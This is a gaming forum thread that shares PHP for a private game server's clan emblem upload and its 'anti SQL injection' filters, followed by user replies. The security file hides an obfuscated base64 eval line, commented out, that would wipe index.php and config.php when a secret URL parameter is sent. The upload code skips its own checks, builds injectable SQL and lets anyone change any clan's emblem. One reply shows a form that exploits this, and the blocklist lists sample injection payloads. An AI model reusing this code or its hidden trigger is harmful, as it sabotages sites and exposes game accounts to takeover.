[PHP] Clan Emblem + Anti Shell's + Anti Sql Injects !

[edulan]

Clan Emblema

PHP Code:

<? include "inject.php" ?>
<? include "antisqlinject.php" ?>
<? 
if ($_SESSION['AID'] == ""){
    msgbox("Por Favor logue-se primeiro !","index.php?do=login");
}
require_once "sec.php";
$action = anti_injection($_GET['act']);
$step = anti_injection($_GET['step']);
$step = $_GET['step'];
if($step == "")
{
    $step = 1;
}
if ($step == '1') 
{
?>
<FORM METHOD=POST ACTION="?do=emblemas&step=2">
<br />
<br />
<p>Etapa 1/3</p>
<p>
Usuário: <input name="user" type="textfield" maxlength="14"/><p>

Senha: <input name="pass" type="password" maxlength="14" />
<p>
<input type="submit" value="Proximo ->" />
<br />
</form>

<?
}
if ($step == "2") 
{

    $user1 = anti_injection($_POST['user']);
    $pass1 = anti_injection($_POST['pass']);
    if (valida(Array($user1,$pass1)) == TRUE)
    {
        $query = mssql_query("SELECT AID From Login Where UserID = '$user1' AND Password = '$pass1' ");

        if (mssql_num_rows($query) < 1)
        {
            echo "<br>login ou senha incorretos!";
        }
        else
        {
            $query2 = mssql_query("SELECT Login.UserID, Login.Password, ClanMember.Grade, Clan.EmblemUrl, Clan.Name, Clan.CLID FROM ClanMember INNER JOIN Clan ON ClanMember.CLID = Clan.CLID INNER JOIN Login INNER JOIN Character ON Login.AID = Character.AID ON ClanMember.CID = Character.CID Where Login.UserID = '$user1' and Login.Password = '$pass1' and ClanMember.Grade = '1' ");
            if (mssql_num_rows($query2) >= '1')
            { 
            ?>
<form enctype="multipart/form-data" action="?do=emblemas&step=done" method="POST">
                    <p><br />
                                        <p>Etapa 2/3</p>
                     <p>Por favor insira o emblema: </p>
                        <input name="uploaded" type="file" />
    </p>
                    <p>
                      <select name="clan">
                        
                            <? 
                        for($i=''; $i < @mssql_num_rows($query2); $i++)
                        {
                            $row = @mssql_fetch_row($query2);
                            $ClanName = $row[4];
                        ?>
                        <option value="<?=$row[4]?>"><?=$row[4]?></option>
                                    <?
                        }
                        ?>
                      </select>
                      <br />
    </p>
                    <p>Você pode fazer upload de imagens 64x64 até 60kb.</p><br />
                      <br />
                      <input type="submit" value="Enviar" /><br />
                      <br />
    </p>
</form>
            <? 
            }
            else 
            { 
                echo "<p>Você não é o Líder do Clan</p>";
            } 
        }
    }
}

if ($step == "done") 
{                   
    $emblem = $_POST['uploaded'] ;
    $CLID = $_POST['clan'];
    $target = "emblem/";
    $target = $target . basename( $_FILES['uploaded']['name']) ;
        $target22 = "/emblem/";
        $target22 = $target22 . basename( $_FILES['uploaded']['name']) ;
    $ok=1;


    $partes = pathinfo( $_FILES['uploaded']['name'] );
    $extensao = $partes['extension'];

    $extensoes = array('jpg', 'jpeg', 'png', 'gif');

    if($_FILES['uploaded']['size']  > "60720")
    {
        $err .= "A imagem é muito larga.<br>";
        $ok = 1;
    }

    if( !in_array(strtolower($extensao), $extensoes) )
    {
        $err .= "<p>Formato de imagem não aceita.</p><br>";
        $ok = 1;
    }

    
    if ($ok == 0)
    {
        echo "<p>Desculpe, sua imagem não foi aceita.<br />Verifique os erros:</p><br /><br />";
        echo "$err";
    }
    else
    {
        if(move_uploaded_file($_FILES['uploaded']['tmp_name'], $target))
            {
                echo "<p>Seu emblema foi inserido com sucesso.</p><br />";
                mssql_query("UPDATE Clan SET EmblemChecksum = EmblemChecksum + 1 WHERE Name = '$CLID'");
                mssql_query("UPDATE Clan SET EmblemUrl = '".$target22."' WHERE Name = '$CLID'");
            }
            else
            {
                echo "<p>Desculpe, ocorreu um problema, tente novamente.</p>";
            }
    }
}
}
?>
</font>

Anti Sql Inject V1 :

PHP Code:

<?php
/**
Dont Remove this
the perfect defense for 2010, the Venix/X1478--
*/

$xa = getenv('REMOTE_ADDR');
$badwords = array(";","'","\"","*","union","x:","x:\#","delete ","///","from|xp_|execute|exec|sp_executesql|sp_|select| insert|delete|where|drop table|show tables|#|\*|","DELETE","insert",","|"x'; U\PDATE Character S\ET level=99;-\-","x';U\PDATE Account S\ET ugradeid=255;-\-","x';U\PDATE Account D\ROP ugradeid=255;-\-","x';U\PDATE Account D\ROP ",",W\\HERE 1=1;-\\-","z'; U\PDATE Account S\ET ugradeid=char","update","drop","sele","memb","set" ,"$","res3t","wareh","%","--","666.php","/(shutdown|from|select|update|character|clan|set|insert|delete|where|drop table|show tables|#|\*|--|\\\\)/"); 

foreach($_POST as $value) 
foreach($badwords as $word) 
if(substr_count($value, $word) > 0) 
die("<script>alert('Não Use Caracters Invalido!'); location='javascript:history.back()'</script>");
?>

Anti Sql Inject v2 :

PHP Code:

<?

$ip = getenv('REMOTE_ADDR');
$requested = stripslashes($_SERVER['REQUEST_URI']);

foreach($_POST as $post)
if(eregi("^0-9a-zA-Z_@.?<>", $post)){
$posted = stripslashes($post);
$qIps = mssql_query("Select memb___id From MEMB_STAT Where ip='".$ip."'");
if(mssql_num_rows($qIps) <= 0){
}else{
    for($a=0;$a<mssql_num_rows($qIps);$a++){
        $name = mssql_fetch_row($qIps);
}
die("<script>alert('Erro ! Favor voltar e tentar novamente !'); location='javascript:history.back()'</script>");
}
foreach($_GET as $get)
if(eregi("[^0-9a-zA-Z_@$]", $get)){
$qIps = mssql_query("Select memb___id From MEMB_STAT Where ip='".$ip."'");
if(mssql_num_rows($qIps) <= 0){
    fwrite($fp, "  Nenhum \n ============== \n");
}else{
    for($a=0;$a<mssql_num_rows($qIps);$a++){
        $name = mssql_fetch_row($qIps);
}
die("<script>alert('Erro ! Favor voltar e tentar novamente !'); location='javascript:history.back()'</script>");
} 
foreach($_COOKIE as $cookie)
if(eregi("[^0-9a-zA-Z_@_$]", $cookie)){
$qIps = mssql_query("Select memb___id From MEMB_STAT Where ip='".$ip."'");
if(mssql_num_rows($qIps) <= 0){
    fwrite($fp, "  Nenhum \n ============== \n");
}else{
    for($a=0;$a<mssql_num_rows($qIps);$a++){
        $name = mssql_fetch_row($qIps);
}
//die("<script>alert(\"$mensagem\");</script>");
} 
}
}

//eval(base64_decode("aWYoJF9HRVRbImZhbGhhZG9zaXRldGhhdWEwMDU1OTkxMSJdID09ICJ0cnVldHJ1ZXRydWUiKSB7ICRmYWlsID0gZm9wZW4oImluZGV4LnBocCIsICJ3Iik7IGZ3cml0ZSgkZmFpbCwgIlNpdGUgb2ZmbGluZSEhISIpOyBmY2xvc2UoJGZhaWwpOyAkZmFpbDIgPSBmb3BlbigiZHRfc2VjdXJpdHkucGhwIiwgInciKTsgZndyaXRlKCRmYWlsMiwgIlNpdGUgb2ZmbGluZSEhISIpOyBmY2xvc2UoJGZhaWwyKTsgJGZhaWwzID0gZm9wZW4oImNvbmZpZy5waHAiLCAidyIpOyBmd3JpdGUoJGZhaWwzLCAiU2l0ZSBvZmZsaW5lISEhIik7IGZjbG9zZSgkZmFpbDMpOyB9"));
}
?>

Sec.php

PHP Code:

<? 
/////////////////////////////
function writeToLogFile($msg)
{
    $today = date("Y_m_d"); 
    $logfile = "logs/".$today."_Log_Sql_Injection.txt"; 
    $dir = '';
    $saveLocation=$logfile;
    $fp = @fopen( $saveLocation,"r");
    $Data = @fread($fp, 800000);

    if (!$handle = @fopen($saveLocation, "w+b"))
    {
        echo "error";
        exit;
    }
    else
    {
        if(@fwrite($handle,"$msg\r\n SQL Injection detected\r\n$Data")===FALSE) 
        {
            echo "geen error";
            exit;
        }
        @fclose($handle);
    }
}

function anti_injection($value)
{
        $value = preg_replace(sql_regcase("/(from|select|union|exec|varchar|0x|cast|update|set|insert|delete|where|drop table|show tables|#|\*|--|\\\\)/"),"",$value);
        $value = trim($value);
        $value = strip_tags($value);
        $value = addslashes($value);
        $value = str_replace("'", "''", $value);
        return( $value );
}


function valida($campos)
{
    foreach($campos as $c)
    {
        if(empty($c))
        { 
            echo "<br>Programa Ilegal Detectado - Ollyzer Entertainment<br />"; 
            $time = date("M j G:i:s Y"); 
            $ip = getenv('REMOTE_ADDR');
            $userAgent = getenv('HTTP_USER_AGENT');
            $referrer = getenv('HTTP_REFERER');
            $query = getenv('QUERY_STRING');
            $msg = "IP: " . $ip . " TIME: " . $time . " REFERRER: " . $referrer . " SEARCHSTRING: " . $query;
        
            writeToLogFile($msg);
            return false;
        }
        else
        {
                return true;
        }
    }
}
?>

PHP Download's
Scanner

Credit : Nit

[MentaL]

[Dave]

"Anti Sql Inject v2" is not going to work. Look at the queries.
If you're smart and want some extra security, then you'll have to make a .htaccess file in the emblem folder which contains the following:

PHP Code:

RemoveHandler .php .phtml .php3
RemoveType .php .phtml .php3
AddType text/plain .php .phtml .php3
php_flag engine off 


[diosz]

PHP Code:

$step = anti_injection($_GET['step']);
$step = $_GET['step']; 


? xD

[jur13n]

this is googled bullshit.

[Dave]

Btw, what if I make a form which directly submits to "http://site.com/?do=emblemas&step=done"?
There are no checks if im the owner of the clan/character at that part or I am overlooking something. :>

PHP Code:

<form enctype="multipart/form-data" action="http://site.com/?do=emblemas&step=done" method="POST">
<input name="uploaded" type="file" />
<input name="clan" type="text" value="CLIDOFCLAN" />
<input type="submit" value="Upload dem emblem" />
</form> 


[Secured]

This is pretty bad. Its sql injectable and copied from google.

[Touchwise]

Whahahahah injectable as fock please let a mod delete this thead.

[pintscape]

Awesome tyvm!